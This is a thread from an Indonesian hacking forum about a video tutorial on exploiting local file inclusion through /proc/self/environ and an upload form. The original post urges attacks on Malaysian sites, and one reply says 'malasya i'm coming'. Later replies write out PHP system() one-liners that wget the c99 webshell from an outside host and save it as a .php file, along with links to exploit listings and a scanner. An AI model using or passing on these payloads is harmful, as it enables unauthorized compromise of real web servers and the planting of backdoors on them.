[video] LFI Local Upload Form
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
[video] LFI Local Upload Form
another video tutorial by AntiSecurity Team
this video still using Tamper Data & /proc/self/environ
but this time we use upload form... )
big thanks to Vrs-hCk a.k.a ander for the idea ^^
watch the video here
http://pacenoge.org/vid/upload_form.html
download here
http://pacenoge.org/vid/upload_form.swf
upload form script
http://pacenoge.org/tool/upload_form.txt
PS : dicomot abis dari evilc0.de
ketemu site .id PATCH!!!
ketemu site .my SIKAT!!!
Greets:
evilc0.de
antisecurity.org
serverisdown.org
mainhack.net
YOU!
this video still using Tamper Data & /proc/self/environ
but this time we use upload form... )
big thanks to Vrs-hCk a.k.a ander for the idea ^^
watch the video here
http://pacenoge.org/vid/upload_form.html
download here
http://pacenoge.org/vid/upload_form.swf
upload form script
http://pacenoge.org/tool/upload_form.txt
PS : dicomot abis dari evilc0.de
ketemu site .id PATCH!!!
ketemu site .my SIKAT!!!
Greets:
evilc0.de
antisecurity.org
serverisdown.org
mainhack.net
YOU!
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: [video] LFI Local Upload Form
Really Nice Idea, jd kelihatan lebih ELEGAN dibanding langsung nanem script buat akses shell.
Makasih infox Paman...
Pamanku mmg org yg baik hati dan suka menabung... :kaca:
Hanya sj jaman skrg Vuln LFI sdh langka banget, jd praktekx di Local Server aja...
Makasih infox Paman...
Pamanku mmg org yg baik hati dan suka menabung... :kaca:
Hanya sj jaman skrg Vuln LFI sdh langka banget, jd praktekx di Local Server aja...
...n0 l1m17...
- dark_superman
- Posts: 13
- Joined: Mon Nov 17, 2008 3:44 pm
- Contact:
Re: [video] LFI Local Upload Form
wow keren kak
ijin coba dulue
malasya i'm coming :ngakak: :ngakak:
ijin coba dulue
malasya i'm coming :ngakak: :ngakak:
Re: [video] LFI Local Upload Form
LFI sangat bertabur ... bisa di coba di liat bugs nya di link berikut :
http://www.exploit-db.com/author/AntiSecurity
http://www.exploit-db.com/author/AntiSecurity
Re: [video] LFI Local Upload Form
hohoo mantap jaya neh....thx pak :love:Paman wrote:LFI sangat bertabur ... bisa di coba di liat bugs nya di link berikut :
http://www.exploit-db.com/author/AntiSecurity
i am not detractor person..like u
be a good boy..
be a good boy..
- wiLMaR_kiDz
- Posts: 964
- Joined: Fri Mar 27, 2009 1:03 pm
- Location: internet
- Contact:
Re: [video] LFI Local Upload Form
weww.....
iya neh, baru tau juga ane...
cz emg LFI stau ane emg jarang bgt ktemu vulnnya..
thankz for sharing paman jack.....
*Nb: btw, thread ane yg kmren2 di 1337 kyanya ada yg gak beres deh om.pdahal blom slesai.hmm...maling emg sh*t.. ;(
iya neh, baru tau juga ane...
cz emg LFI stau ane emg jarang bgt ktemu vulnnya..
thankz for sharing paman jack.....
*Nb: btw, thread ane yg kmren2 di 1337 kyanya ada yg gak beres deh om.pdahal blom slesai.hmm...maling emg sh*t.. ;(
regards,
ordinary user,-
ordinary user,-
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: [video] LFI Local Upload Form
sebenerx klo fungsi system,exec,shell_exec diaktifkan di mesin itu, bisa jg kan langsung tumpangin skrip buat ngedownload webshell.
<? system('wget http://www.source.com/c99.txt'); ?>
<? system('mv c99.txt c99.php'); ?>
<? system('wget http://www.source.com/c99.txt'); ?>
<? system('mv c99.txt c99.php'); ?>
...n0 l1m17...
Re: [video] LFI Local Upload Form
3xtr3m3b0y wrote:sebenerx klo fungsi system,exec,shell_exec diaktifkan di mesin itu, bisa jg kan langsung tumpangin skrip buat ngedownload webshell.
<? system('wget http://www.source.com/c99.txt'); ?>
<? system('mv c99.txt c99.php'); ?>
lebih gampang : <? system('wget http://www.source.com/c99.txt -O nenen.php'); ?>
yakin lah.. karena 1 baris command pun sangat berharga,.. eh bukan.. tapi karena saya suka nenen ^^v
hsuiahsiuahsiuahsiuahsa
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: [video] LFI Local Upload Form
Nyang penting bukan nenen cucu basi aja Paman (Red: susu nenek2) :devilPaman wrote:3xtr3m3b0y wrote:sebenerx klo fungsi system,exec,shell_exec diaktifkan di mesin itu, bisa jg kan langsung tumpangin skrip buat ngedownload webshell.
<? system('wget http://www.source.com/c99.txt'); ?>
<? system('mv c99.txt c99.php'); ?>
lebih gampang : <? system('wget http://www.source.com/c99.txt -O nenen.php'); ?>
yakin lah.. karena 1 baris command pun sangat berharga,.. eh bukan.. tapi karena saya suka nenen ^^v
hsuiahsiuahsiuahsiuahsa
Makasih banyak pencerahanx Paman...
...n0 l1m17...
Re: [video] LFI Local Upload Form
karena saya yakin situ sudah putus asa dengan mendengar target LFI..
silahkan di lanjut kan dengan membaca post dari AntiSecurity berikut dan mencoba nya
http://antisecurity.org/0x99/vopcrew-ijo-scanner.html
ijo kk ijo..
semua itu tergantung face [NoGe]
real big thanks to
AntiSecurity.org + serverISdown.org + MainHack BrotherHood
silahkan di lanjut kan dengan membaca post dari AntiSecurity berikut dan mencoba nya
http://antisecurity.org/0x99/vopcrew-ijo-scanner.html
ijo kk ijo..
semua itu tergantung face [NoGe]
real big thanks to
AntiSecurity.org + serverISdown.org + MainHack BrotherHood